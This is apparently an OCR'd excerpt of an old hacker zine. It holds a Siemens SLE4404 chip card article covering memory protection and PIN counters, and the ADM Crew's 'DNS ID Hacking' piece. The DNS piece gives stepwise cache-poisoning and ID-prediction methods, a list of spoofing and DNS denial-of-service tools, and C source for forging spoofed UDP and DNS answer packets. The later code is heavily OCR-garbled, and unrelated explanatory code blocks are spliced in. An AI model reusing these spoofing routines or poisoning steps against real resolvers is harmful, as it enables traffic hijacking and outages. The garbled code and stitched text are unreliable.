        printf("Unsupported password length %d.\n", nc); 
        return 1; 
    } 

    printf("Decoded Password: ["); 
    for (x=1;x<nc+1;x++) putchar(decode_char(nc, inps[x-1], x)); 
    printf("]\n"); 
    free(tz); 
    return 0; 
} 

<--> 


0x3> 


Siemens Chip Card Technology 


by Yggdrasil 


Chip cards differ from one another in memory size, type of memory (PROM or 
EPROM), security logic and micro-controller. This article will discuss the 
Siemens SLE4404 chip card technology. 




The SLE4404 is employed for electronic purse cards and bank transactions, 
cellular telephony (pre-payed cards), user IDs for access control, etc. (some 
examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed 
through a simple TTL serial channel, providing a +5 Vcc power supply from an 
external source. 


Inside the chip 


The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix 
(each row is 16-bits) that is protected by security logic providing access 
control. 


This is the logic diagram: 


                 Address Counter --> Column Decoder 
                                          | 
                                       16 | 
                                          v 
  C3, C8, C2 --> Control &  --> Row  --> User mem         208 bit 
  C1 (Vcc)   --> Security       Decoder  Sec unit         192 bit 
  C7 (I/O)  <--> Logic                   Special mem unit  16 bit 


The SLE4404 memory is subdivided in three main memory blocks: one is read 
only (a "PROM" containing the manufacturer code and/or a serial number and 
an expiration date), the second is both readable and writeable (user memory) 
and the last block cannot be written to unless the lock-out fuse has been 
fused. 


This is the memory map: 

BLOCK TYPE           SIZE (BIT)  ADDRESS   READABLE  WRITEABLE  ERASEABLE 
Manufacturer code        16        0-15      Yes       No         No 
Application ROM          48       16-63      Yes       No         No 
User code                16       64-79     [fuse]     U.C.       U.C. 
Error counter             4       80-83      Yes       Yes        U.C. 
EEPROM #1                12       84-95      Yes       Yes        U.C. 
EEPROM #2                16       96-111     Yes       Yes        U.C. 
Frame memory block 
 - F.M. config            2      112-113     Yes       Yes        U.C./R.C. 
 - Frame memory         206      114-319    [cfg]     [cfg]       U.C./R.C. 
Frame code               32      320-351    [fuse]    [fuse]      [cfg] 
Frame counter            64      352-415     Yes       Yes        [cfg] 


Meaning of abbreviations: 


U.C.   - User code required 
         (each time the code is entered the error counter is decreased) 
R.C.   - Frame code required 
         (each time the code is entered the frame counter is decreased) 
[fuse] - Operation allowed ONLY IF lock-out fuse is not fused 
[cfg]  - Operation allowed according to frame memory configuration 


Frame memory configuration table: 


BIT 112   BIT 113   MEMORY MODE    READABLE   WRITEABLE 
   0         0      Secret ROM       Yes        No 
   0         1      R.O.M.           Yes        No 
   1         0      Secret PROM      U.C.       U.C. 
   1         1      P.R.O.M.         U.C.       U.C. 
The first 16-bit block is for the Manufacturer Code. The following 48-bit 
block is called Application ROM, containing another code (Manufacturer sub 
code or info, serial number, sub-type of card, etc). 


The User Code is the access code (PIN) used to read/write/erase memory, 
while the error counter value can be modified even if the fuse was fused... 


Please note that access to memory is blocked after four incorrect access 
trials (checked by the counter). The same is for the Frame Code and the 
Frame [error] Counter (note that the number of incorrect accesses is limited 
to three trials instead of four). 


Finally, the Frame Memory is generally used for storing personal user 
information or the credit limit (money that can be fetched in a bank 
transaction, or the remaining "virtual" credit that a pre-payed cellular card 
contains). 
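As an added illustration (this is not code from the article or from Siemens), the access rules above can be modelled in C: the error counter that costs one trial per user-code entry and locks the card after four wrong codes, the three-trial frame counter, and the frame-memory mode bits. Restoring the counter on a correct code is this model's own assumption.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

#define USER_TRIALS  4   /* user code: access blocked after four wrong entries */
#define FRAME_TRIALS 3   /* frame code: blocked after three wrong entries */

/* Frame-memory mode from config bits 112 (high bit) and 113 (low bit). */
enum fm_mode { FM_SECRET_ROM = 0, FM_ROM = 1, FM_SECRET_PROM = 2, FM_PROM = 3 };

/* A simulated card; hypothetical structure, not the silicon's register map. */
struct sle4404 {
    uint16_t     user_code;      /* bits 64-79 */
    unsigned     error_counter;  /* bits 80-83: user-code trials left */
    uint32_t     frame_code;     /* bits 320-351 */
    unsigned     frame_counter;  /* frame-code trials left */
    bool         fuse_blown;     /* lock-out fuse state */
    enum fm_mode cfg;            /* bits 112-113 */
    bool         user_ok;        /* user code accepted (U.C. access held) */
    bool         frame_ok;       /* frame code accepted (R.C. access held) */
};

void card_init(struct sle4404 *c, uint16_t ucode, uint32_t fcode,
               enum fm_mode cfg, bool fuse_blown)
{
    memset(c, 0, sizeof *c);
    c->user_code = ucode;
    c->frame_code = fcode;
    c->cfg = cfg;
    c->fuse_blown = fuse_blown;
    c->error_counter = USER_TRIALS;
    c->frame_counter = FRAME_TRIALS;
}

/* One code comparison: the counter is decreased on every entry, and a card
 * whose counter has reached zero refuses to compare at all (the lock-out).
 * On a match the counter is restored, modelling the U.C.-protected erase of
 * the counter field; this restore is the model's assumption. */
static bool try_code(unsigned *counter, unsigned trials, bool match, bool *granted)
{
    if (*counter == 0) return false;
    (*counter)--;
    if (!match) return false;
    *counter = trials;
    *granted = true;
    return true;
}

bool present_user_code(struct sle4404 *c, uint16_t code)
{
    return try_code(&c->error_counter, USER_TRIALS, code == c->user_code, &c->user_ok);
}

bool present_frame_code(struct sle4404 *c, uint32_t code)
{
    return try_code(&c->frame_counter, FRAME_TRIALS, code == c->frame_code, &c->frame_ok);
}

/* Frame memory (bits 114-319) permissions follow the configuration table:
 * both ROM modes are readable by anyone and never writeable, both PROM
 * modes need the user code for reading and for writing. */
bool frame_readable(const struct sle4404 *c)
{
    return (c->cfg == FM_SECRET_ROM || c->cfg == FM_ROM) || c->user_ok;
}

bool frame_writeable(const struct sle4404 *c)
{
    return (c->cfg == FM_SECRET_PROM || c->cfg == FM_PROM) && c->user_ok;
}

/* The user code is readable only while the lock-out fuse is intact, and
 * writeable only with U.C. access (memory map row "User code"). */
bool user_code_readable(const struct sle4404 *c) { return !c->fuse_blown; }

bool set_user_code(struct sle4404 *c, uint16_t code)
{
    if (!c->user_ok) return false;
    c->user_code = code;
    return true;
}

/* The frame code can be rewritten only while the fuse is intact ([fuse]). */
bool set_frame_code(struct sle4404 *c, uint32_t code)
{
    if (c->fuse_blown) return false;
    c->frame_code = code;
    return true;
}
```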


The Pin-out 


This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): 

  Contact layout        Contact  Pin  Info 
    C1    C5               1      6   Vcc +5V 
    C2    C6               2      5   Reset 
    C3    C7               3      4   Clock 
    C4    C8               4      3   Test input - N.C. 
                           5      8   Ground 
                           6      7   N.C. 
                           7      1   Bi-directional I/O data line 
                           8      2   Control input (data change) 
"I am for ever walking upon these shores, 
betwixt the sand and the foam. 
The high tide will erase my foot-prints, 
and the wind will blow away the foam. 
But the sea and the shore will remain 
For ever." 
-- Gibran K. Gibran 


0x4> 
.oO THE ADM CreW Oo.. 
presents 
DNS ID Hacking 
--[1]-- DNS ID Hacking Presentation 
You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID 
Hacking isn't the usual kind of hacking/spoofing. This method is based on a 
vulnerability in the DNS protocol. More brutal, the DNS ID hack/spoof is very 
efficient and very strong as there is no generation of DNS daemons that 
escapes from it (even WinNT!). 


--[1.1]-- DNS Protocol mechanism explanation 

In the first step, you must know how the DNS works. I will only explain the 
most important facts of this protocol. In order to do that, we will follow 
the way of a DNS request packet from A to Z! 


Name resolution example: 


The client (bla.bibi.com) sends a request of resolution of the domain 
"www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for 
DNS. Let's take a look at the following picture.. 

 /-------------------------------------------\ 
 | 111.1.2.123 = bla.bibi.com                | 
 | 111.1.2.222 = dns.bibi.com                | 
 | format:                                   | 
 |   IP_ADDR:PORT->IP_ADDR:PORT              | 
 | ex:                                       | 
 |   111.1.2.123:1999->111.1.2.222:53        | 
 \-------------------------------------------/ 

gethostbyname("www.heike.com"); 

[bla.bibi.com]                              [dns.bibi.com] 
111.1.2.123:1999 ---> [?www.heike.com] ---> 111.1.2.222:53 


Here we see our resolution name request from source port 1999 which is asking 
to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has 
received the resolution request from bla.bibi.com, dns.bibi.com will have to 
resolve the name: 


[dns.bibi.com]                                 [ns.internic.net] 
111.1.2.222:53 ---> [dns?www.heike.com] ---> 198.41.0.4:53 


dns.bibi.com asks ns.internic.net who the root name server for the address 
of www.heike.com is, and if it doesn't have it, it sends the request to a name 
server which has authority on '.com' domains (note: we send a request to the 
Internic because it could have this request in its cache). 


[ns.internic.net]                                       [ns.bibi.com] 
198.41.0.4:53 ---> [ns for.com is 144.44.44.4] ---> 111.1.2.222:53 


Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS 
that has authority over the domain bibi.com), that the name server of for.com 
has the IP 144.44.44.4 (let’s call it ns.for.com). Now our ns.bibi.com will 
ask to ns.for.com for the address of www.heike.com, but this one doesn’t have 
it and will forward the request to the DNS of heike.com which has authority 
for heike.com. 


[ns.bibi.com]                               [ns.for.com] 
111.1.2.222:53 ---> [?www.heike.com] ---> 144.44.44.4:53 


The answer from ns.for.com: 


[ns.for.com]                                              [ns.bibi.com] 
144.44.44.4:53 ---> [ns for heike.com is 31.33.7.4] ---> 111.1.2.222:53 


Now that we know which IP address has authority on the domain "heike.com" 
(we’1l1 call it ns.heike.com), we ask it what’s the IP of the machine 
www.heike.com. 


[ns.bibi.com] [ns.heike.com] 
111.1.2.222:53 ----- > [?www.heike.com] ----> 31.33.7.4:53 


We now have our answer: 


[ns.heike.com]                                        [ns.bibi.com] 
31.33.7.4:53 ---> [www.heike.com == 31.33.7.44] ---> 111.1.2.222:53 


Great we have the answer, we can forward it to our client bla.bibi.com. 


[ns.bibi.com]                                           [bla.bibi.com] 
111.1.2.222:53 ---> [www.heike.com == 31.33.7.44] ---> 111.1.2.123:1999 


Now bla.bibi.com knows the IP of www.heike.com. 
Now let's imagine that we'd like to have the name of a machine from its IP, in 
order to do that, we proceed a bit differently as the IP will have to be 
transformed. 


Reverse name lookup resolution: 
100.20.40.3 will become 3.40.20.100.in-addr.arpa 


This method is only for the IP resolution request (reverse DNS). 


Let’s look at a practical example of when we take the IP address of 
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation 
into a comprehensible format by DNS). 


gethostbyaddr ("31.33.7.44"); 


We send our request to ns.bibi.com: 


[bla.bibi.com]                                           [ns.bibi.com] 
111.1.2.123:2600 ---> [?44.7.33.31.in-addr.arpa] ---> 111.1.2.222:53 


Which is forwarded to ns.internic.net: 


[ns.bibi.com] [ns.internic.net] 
111.1.2.222:53  ----- > [?44.7.33.31.in-addr.arpa] ------ > 198.41.0.4:53 


ns.internic.net will send the IP of a name server which has authority on 
’31.in-addr.arpa’. 


[ns.internic.net]                                              [ns.bibi.com] 
198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 


Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: 


[ns.bibi.com]                                           [ns.for.com] 
111.1.2.222:53 ---> [?44.7.33.31.in-addr.arpa] ---> 144.44.44.4:53 

And so on. The mechanism is nearly the same that was used for name resolution. 
--[1.2]-- DNS packet header 


Here is the format of a DNS message 


 +----------------------------+----------------------------+ 
 |     ID (the famous :)      |           flags            | 
 +----------------------------+----------------------------+ 
 |    numbers of questions    |    numbers of answers      | 
 +----------------------------+----------------------------+ 
 |   number of RR authority   | number of supplementary RR | 
 +----------------------------+----------------------------+ 
 \                         QUESTION                        \ 
 \                         ANSWER                          \ 
 \                  Stuff etc.. No matter                  \ 


--[1.3]-- Structure of DNS packets. 
The ID permits us to identify each DNS packet: since exchanges between name 
servers are from port 53 to port 53, and moreover there might be more than one 
request at a time, the ID is the only way to tell the different DNS 
requests apart. We'll talk about it later... 


__flags__ 
The flags area is divided into several parts 


        1 bit   4 bits   1    1    1    1   3 bits (always 0)   4 bits 
          |       |      |    |    |    |         |               | 
        [ QR | opcode | AA | TC | RD | RA |     zero      |     rcode ] 
QR = If the QR bit = 0, it means that the packet is a question, otherwise 
it's an answer. 
opcode = The value is 0 for a normal request, 1 for a reverse request, and 
2 for a status request (we don't need to know all these modes). 
AA = If it's equal to 1, it says that the name server has an authoritative 
answer. 
TC = No matter 
RD = If this flag is set to 1, it means "Recursion Request"; for example when 
bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the 
DNS to take on this request. 
RA = If it's set to 1, it means that recursion is available. This bit is 
set to 1 in the answer of the name server if it supports recursion. 
Zero = Here are three zeroes... 
rcode = It contains the return code for DNS requests: if 0, it means 
"no error", 3 means "name error". 


The 2 following flags don’t have any importance for us. 


DNS QUESTION: 


Here is the format of a DNS question 


 +-------------------------------------+ 
 |        name of the question         | 
 +------------------+------------------+ 
 | type of question |  type of query   | 
 +------------------+------------------+ 


The structure of the question is like this. 


example: 
www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
for an IP address, the format remains the same. 


44.33.88.123.in-addr.arpa would be: 
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] 
[note]: a compression format exists, but we won’t cover it. 


type of question: 
Here are the values that we will use most of the time (there are many more, 
but these are the only ones relevant): 


 name   value 
 A    |   1  | IP Address (resolving a name to an IP) 
 PTR  |  12  | Pointer (resolving an IP to a name) 


type of query: 


The values are the same as the type of question. 


DNS ANSWER: 


Here is the format of an answer (an RR) 


 +-------------------------------------+ 
 |         name of the domain          | 
 +------------------+------------------+ 
 |       type       |      class       | 
 +------------------+------------------+ 
 |         TTL (time to live)          | 
 +-------------------------------------+ 
 |        resource data length         | 
 +-------------------------------------+ 
 |           resource data             | 
 +-------------------------------------+ 


name of the domain: 


The name of the domain refers to the following resource: the domain name 
is stored in the same way as in the question part of the resolution request. 
For www.heike.com, the field "name of the domain" will contain 
[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. 


type: 


The type flag is the same than "type of query" in the question part of the 
packet. 


class: 
The class flag is equal to 1 for Internet data. 


time to live: 
This flag explains in seconds the time-life of the information into the 
name server cache. 


resource data length: 
The length of resource data, for example if resource data length is 4, it 
means that the data in resources data are 4 bytes long. 


resource data: 
here we put the IP for example (at least in our case) 


I will offer you a little example that explains this better: 


Here is what’s happening when ns.bibi.com asks ns.heike.com for 
www.heike.com’s address 


ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) 
ID = 1999  QR = 0  opcode = 0  RD = 1 
numbers of questions = htons(1)        numbers of answers = 0 
number of RR authoritative = 0         number of supplementary RR = 0 
<the question part> 
name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
type of question = htons(1)            type of query = htons(1) 


here is for the question. 


now let's look at the answer of ns.heike.com 


ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 
ID = 1999  QR = 1  opcode = 0  RD = 1  AA = 1  RA = 1 
numbers of questions = htons(1)        numbers of answers = htons(1) 
number of RR authoritative = 0         number of supplementary RR = 0 
name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
type of question = htons(1)            type of query = htons(1) 
name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] 
type = htons(1) | class = htons(1) 
time to live = 999999 
resource data length = htons(4) | resource data = inet_addr("31.33.7.44") 


Yah! That’s all for now :)) 


Here is an analysis: 

In the answer QR = 1 because it’s an answer :) 

AA = 1 because the name server has authority in its domain 
RA = 1 because recursion is available 


Good =) I hope you understood that cause you will need it for the following 
events. 


--[2.0]-- DNS ID hack/spoof 


Now it’s time to explain clearly what DNS ID hacking/spoofing is. 

Like I explained before, the only way for the DNS daemon to recognize 

the different questions/answers is the ID flag in the packet. Look at this 
example: 


ns.bibi.com:53 -----> [?www.heike.com] ------> ns.heike.com:53 


So you only have to spoof the ip of ns.heike.com and answer your false 
information before ns.heike.com to ns.bibi.com! 


ns.bibi.com <---[IP for www.heike.com is 31.33.7.44]--- ns.heike.com 
    | 
    |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com 


But in practice you have to guess the good ID :) If you are on a LAN, you 
can sniff to get this ID and answer before the name server (it's easy on a 
Local Network :) 


If you want to do this remotely you don't have a lot of choices, you only 
have 4 basic methods: 


1. Randomly test all the possible values of the ID flag. You must answer 
   before the ns ! (ns.heike.com in this example). This method is obsolete 
   unless you want to know the ID .. or any other favorable condition to 
   its prediction. 


2. Send some DNS requests (200 or 300) in order to increase the chances 
   of falling on the good ID. 


3. Flood the DNS in order to avoid its work. The name server will crash 
   and show the following error! 

   >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT 
   at this time named daemon is out of order :) 


4. Or you can use the vulnerability in BIND discovered by SNI (Secure 
   Networks, Inc.) with ID prediction (we will discuss this in a bit). 


######################## Windows ID Vulnerability ######################## 


I found a heavy vulnerability in Windows 95 (I haven't tested it on 
NT), let's imagine my little friend that's on Windows 95. 

Windows IDs are extremely easy to predict because it's "1" by default :))) 
"2" for the second question (if there are 2 questions at the same time). 


########################## BIND Vulnerability ########################### 


There is a vulnerability in BIND (discovered by SNI as stated earlier). 
In fact, DNS IDs are easily predictable, you only have to sniff a DNS in 
order to do what you want. Let me explain... 


The DNS uses a random ID at the beginning but it only increases this ID for 
the next questions ... =))) 


It's easy to exploit this vulnerability. 
Here is the way: 


1) Be able to sniff easily the messages that come to a random DNS (ex. 
   ns.dede.com for this sample). 


2) You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will 
   ask ns.dede.com to resolve (random).dede.com 


   ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com 


3) Now you have the ID of the message from NS.victim.com, now you know what 
   ID area you'll have to use. (ID = 444 in this sample). 


4) You then make your resolution request. ex. www.microsoft.com to 
   NS.victim.com 


   (you) ---> [?www.microsoft.com] ---> ns.victim.com 
   ns.victim.com ---> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com 


5) Flood the name server ns.victim.com with the ID (444) you already have and 
   then you increase this one. 


   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com 
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com 
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com 
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com 
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com 
   ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com 


3.txt Wed Apr 26 09:43:42 2017 11 


(now you know that DNS IDs are predictable, and they only increase. You 
flood ns.victim.com with spoofed answers with the ID 444+ ;) 


xxx ADMsnOOfID does this. 


There is another way to exploit this vulnerability without root on 
any DNS. 


The mechanism is very simple. Here is the explanation 
We send to ns.victim.com a resolution request for *.provnet.fr 
(you) ---------- [? (random) .provnet.fr] ------- > ns.victim.com 


Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. 
There is nothing new here, but the interesting part begins here. 


From this point you begin to flood ns.victim.com with spoofed answers 
(with ns1.provnet.fr IP) with ids from 100 to 110... 


(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com 
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com 


After that, we ask ns.victim.com if (random).provnet.fr has an IP. 


If ns.victim.com gives us an IP for (random).provnet.fr then we have 
found the correct ID :) Otherwise we have to repeat this attack until we 
find the ID. It's a bit long but it's effective. And nothing forbids you 
to do this with friends ;) 


This is how ADMnOg00d works ;) 
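Added here as a defender-side check (not code from ADM's pack): given query IDs observed from a resolver one is responsible for, in the order they were sent, decide whether they are allocated sequentially, as in the BIND and Windows 95 cases described above. The sample ID lists are constructed for this example and the 16-step window is this example's assumption.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdbool.h>

/* Count steps of exactly +1 (mod 2^16) between consecutive observed IDs.
 * A resolver that increments its ID per query, as the BIND behaviour above,
 * scores n-1; one drawing fresh random IDs scores about (n-1)/65536. */
size_t sequential_steps(const uint16_t *ids, size_t n)
{
    size_t hits = 0, i;
    for (i = 1; i < n; i++)
        if ((uint16_t)(ids[i] - ids[i - 1]) == 1) hits++;
    return hits;
}

/* Count steps that stay within a small window ahead (0..window).  This is
 * the "ID area" a single sniffed value gives away even when the increment
 * is not exactly one, e.g. with several queries in flight between two
 * observations. */
size_t nearby_steps(const uint16_t *ids, size_t n, unsigned window)
{
    size_t hits = 0, i;
    for (i = 1; i < n; i++)
        if ((uint16_t)(ids[i] - ids[i - 1]) <= window) hits++;
    return hits;
}

/* Verdict: predictable when more than half of the steps land within the
 * window.  Fewer than 4 samples is too little to judge. */
bool ids_look_predictable(const uint16_t *ids, size_t n)
{
    if (n < 4) return false;
    return nearby_steps(ids, n, 16) * 2 > (n - 1);
}

/* Constructed samples (not captured traffic): the sequential run from the
 * article, a Windows-95-style resolver that restarts at 1, and one that
 * randomises. */
static const uint16_t sample_sequential[] = { 444, 445, 446, 447, 448, 449 };
static const uint16_t sample_win95[]      = { 1, 2, 1, 1, 2, 1 };
static const uint16_t sample_random[]     = { 0x8c41, 0x17de, 0xf003,
                                              0x52aa, 0x9b1c, 0x2d77 };

/* Verdict for each sample: 1 = predictable, 0 = not. */
int verdict_sequential(void) { return ids_look_predictable(sample_sequential, 6); }
int verdict_win95(void)      { return ids_look_predictable(sample_win95, 6); }
int verdict_random(void)     { return ids_look_predictable(sample_random, 6); }
```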


############################################################################## 
Here you will find 5 programs 

ADMkillDNS  - very simple DNS spoofer 
ADMsniffID  - sniff a LAN and reply false DNS answers before the NS 
ADMsnOOfID  - a DNS ID spoofer (you'll need to be root on a NS) 
ADMnOg00d   - a DNS ID predictor (no need to be root on a NS) 
ADMdnsfuckr - a very simple denial of service attack to disable DNS 


Have fun!! :) 

Note: You can find source and binaries of these progs at 
ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would 
be on janova. You need to install libpcap on your machine before any 
compilation of the ADMID proggies :) 


ADM Crew. 


Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love 
these guys) 

Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at 
www.secnet.com for finding the vulnerability =) 


<++> ADMIDpack/ADM-spoof.c 
/*****************************************************************/ 
/* ADM spoofing routine for spoof udp                            */ 
/*****************************************************************/ 
#define IPHDRSIZE sizeof(struct iphdr) 
#define UDPHDRSIZE sizeof(struct udphdr) 
#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <memory.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <sys/wait.h> 
#include <sys/ioctl.h> 
#include <sys/stat.h> 
#include <netdb.h> 
#include <netinet/in.h> 
#include "ip.h"    /* the pack's own IP header definition (struct iphdr) */ 
#include "udp.h"   /* the pack's own UDP header definition (struct udphdr) */ 

/*****************************************************************/ 
/* 
 * in_cksum -- 
 *      Checksum routine for Internet Protocol family headers (C Version) 
 */ 
/*****************************************************************/ 
unsigned short in_cksum(addr, len) 
u_short *addr; 
int len; 
{ 
    register int nleft = len; 
    register u_short *w = addr; 
    register int sum = 0; 
    u_short answer = 0; 

    /* 
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add 
     * sequential 16 bit words to it, and at the end, fold back all the 
     * carry bits from the top 16 bits into the lower 16 bits. 
     */ 
    while (nleft > 1) { 
        sum += *w++; 
        nleft -= 2; 
    } 

    /* mop up an odd byte, if necessary */ 
    if (nleft == 1) { 
        *(u_char *)(&answer) = *(u_char *)w; 
        sum += answer; 
    } 

    /* add back carry outs from top 16 bits to low 16 bits */ 
    sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */ 
    sum += (sum >> 16);                   /* add carry */ 
    answer = ~sum;                        /* truncate to 16 bits */ 
    return (answer); 
} 

/* Build a raw IP+UDP datagram with the given addresses and ports and 
 * send it through the raw socket s (which must have IP_HDRINCL set). 
 * Returns what sendto() returns. */ 
int udp_send(s, saddr, daddr, sport, dport, datagram, datasize) 
int s; 
unsigned long saddr; 
unsigned long daddr; 
unsigned short sport; 
unsigned short dport; 
char *datagram; 
unsigned datasize; 
{ 
    struct sockaddr_in sin; 
    struct iphdr *ip; 
    struct udphdr *udp; 
    unsigned char *data; 
    unsigned char packet[4024]; 
    int x; 

    ip   = (struct iphdr *) packet; 
    udp  = (struct udphdr *) (packet+IPHDRSIZE); 
    data = (unsigned char *) (packet+IPHDRSIZE+UDPHDRSIZE); 

    memset(packet, 0, sizeof(packet)); 

    /* UDP header; no UDP checksum is computed (check = 0 is legal for IPv4) */ 
    udp->source = htons(sport); 
    udp->dest   = htons(dport); 
    udp->len    = htons(UDPHDRSIZE+datasize); 
    udp->check  = 0; 

    memcpy(data, datagram, datasize); 

    /* IP header */ 
    memset(packet, 0, IPHDRSIZE); 
    ip->saddr.s_addr = saddr; 
    ip->daddr.s_addr = daddr; 
    ip->version  = 4; 
    ip->ihl      = 5; 
    ip->ttl      = 245; 
    ip->id       = random()%5985; 
    ip->protocol = IPPROTO_UDP; 
    ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE + datasize); 
    ip->check    = 0; 
    ip->check    = in_cksum((u_short *) packet, IPHDRSIZE); 

    sin.sin_family      = AF_INET; 
    sin.sin_addr.s_addr = daddr; 
    sin.sin_port        = udp->dest; 

    x = sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, 
               (struct sockaddr*)&sin, sizeof(struct sockaddr)); 
    return (x); 
} 

/*****************************************************************/ 
/* RECV PAKET                                                    */ 
/* get_pkt(socket, *buffer, size of the buffer);                 */ 
/*****************************************************************/ 
int get_pkt(s, data, size) 
int s; 
unsigned char *data; 
int size; 
{ 
    struct sockaddr_in sin; 
    socklen_t len; 
    int resu; 

    len = sizeof(sin); 
    resu = recvfrom(s, data, size, 0, (struct sockaddr *)&sin, &len); 
    return resu; 
} 
<--> 
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<++> ADMIDpack/ADMDNS2.c 
[BORK KR KKK KK KK IK OK OK KK / 


/* DNS include for play with DNS packet (c) ADM */ 


[BORK RR KKK KK KR RK OR RK OR KK / 


define ERROR -1 
define DNSHDRSIZE 12 
define TYPE_A 1 
define TYPE_PTR 12 


int myrand() 

{ 

int Jj; 

j=l+(int) (150.0*rand()/ (RAND_MAX+1.0)); 
return (Jj); 


} 


unsigned long host2ip(char *serv) 


{ 
struct sockaddr_in sinn; 
struct hostent *hent; 


hent=gethostbyname (serv) ; 

if(hent == NULL) return 0; 

bzero((char *)&sinn, sizeof(sinn)); 

bcopy (hent->h_addr, (char *)&sinn.sin_addr, hent-—>h_length) ; 
return sinn.sin_addr.s_addr; 


void nameformat (char *name,char *QS) 
{ 

/* CRAP & LAme COde :) */ 

char lol[3000]; 

char tmp[2550]; 

char tmp2[2550]; 

int i,a=0; 
bzero(lol, sizeof (lol) ) 
bzero (tmp, sizeof (tmp) ); 
bzero(tmp2, sizeof (tmp2) ); 


1’ 


for (i1=0;1i<strlen (name) ; i++) 

{ 

if( *(nameti) == ’.’ d{ 
sprintf (tmp2,"%Sc%Ss",a,tmp) ; 
strceat (lol, tmp2) ; 
bzero (tmp, sizeof (tmp) ); 
bzero(tmp2, sizeof (tmp2) ); 
a=0; 
} 

else tmp[att+] = *(nameti); 


} 


sprintf (tmp2,"%Sc%s",a,tmp) ; 
strceat (lol, tmp2) ; 
strcpy(QS,lol); 

} 


void nameformatIP(char *ip, char *resu) 


{ 
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char *arpa = "in-addr.arpa"; 
char bike. [-25.5)]'¢ 
char arf[255]; 
char haha[255]; 
char c; 

char *A[4]; 

int i,a=3,k=0; 


bzero(bla, sizeof (bla) 
bzero(arf, sizeof (arf) 
bzero (haha, sizeof (hah 


i 
i 
a)); 
for (i=0;i<4; itt) { 

Afi] =(char *)malloc(4); 

bzero(A[i],4); 

} 


bzero(bla, sizeof (bla)); 
bzero(arf,sizeof(arf)); 


for (i=0;i<strlen(ip);itt) 
{ 


c = iplil; 

Lf eS] el yf 
streat (A[a],arf); 
a--; 
k=0; 


bzero(arf,sizeof(arf)); 


} 
else arf[k++] = c; 


} 
strceat (A[a],arf); 


for (i=0;1i<4; itt) { 
strceat (bla,A[i]); 
strceat (bla,"."); 


} 


strcat (bla,arpa); 
nameformat (bla, haha) ; 
strcpy (resu, haha) ; 


} 


15 


int makepaketQS(char *data,char *name,int type)
{
  if(type == TYPE_A ){
    nameformat(name,data);
    *((u_short *)(data+strlen(data)+1)) = htons(TYPE_A);
  }
  if(type == TYPE_PTR){
    nameformatIP(name,data);
    *((u_short *)(data+strlen(data)+1)) = htons(TYPE_PTR);
  }
  *((u_short *)(data+strlen(data)+3)) = htons(1);
  return(strlen(data)+5);
}

int makepaketAW(char *data,char *name,char *ip,int type)
{
  int i;
  char tmp[2550];
  bzero(tmp,sizeof(tmp));

  if( type == TYPE_A ) {
    nameformat(name,data);
    *((u_short *)(data+strlen(data)+1)) = htons(TYPE_A);
    *((u_short *)(data+strlen(data)+3)) = htons(1);
    i=strlen(data)+5;
    strcpy(data+i,data);
    i=i+strlen(data)+1;
    *((u_short *)(data+i)) = htons(TYPE_A);
    *((u_short *)(data+i+2)) = htons(1);
    *((u_long *)(data+i+4)) = 9999999;
    *((u_short *)(data+i+8)) = htons(4);
    *((u_long *)(data+i+10)) = host2ip(ip);
    return(i+14);
  }

  if( type == TYPE_PTR ){
    nameformat(name,tmp);
    nameformatIP(ip,data);
    *((u_short *)(data+strlen(data)+1)) = htons(TYPE_PTR);
    *((u_short *)(data+strlen(data)+3)) = htons(1);
    i=strlen(data)+5;
    strcpy((data+i),data);
    i=(i+strlen(data)+1);
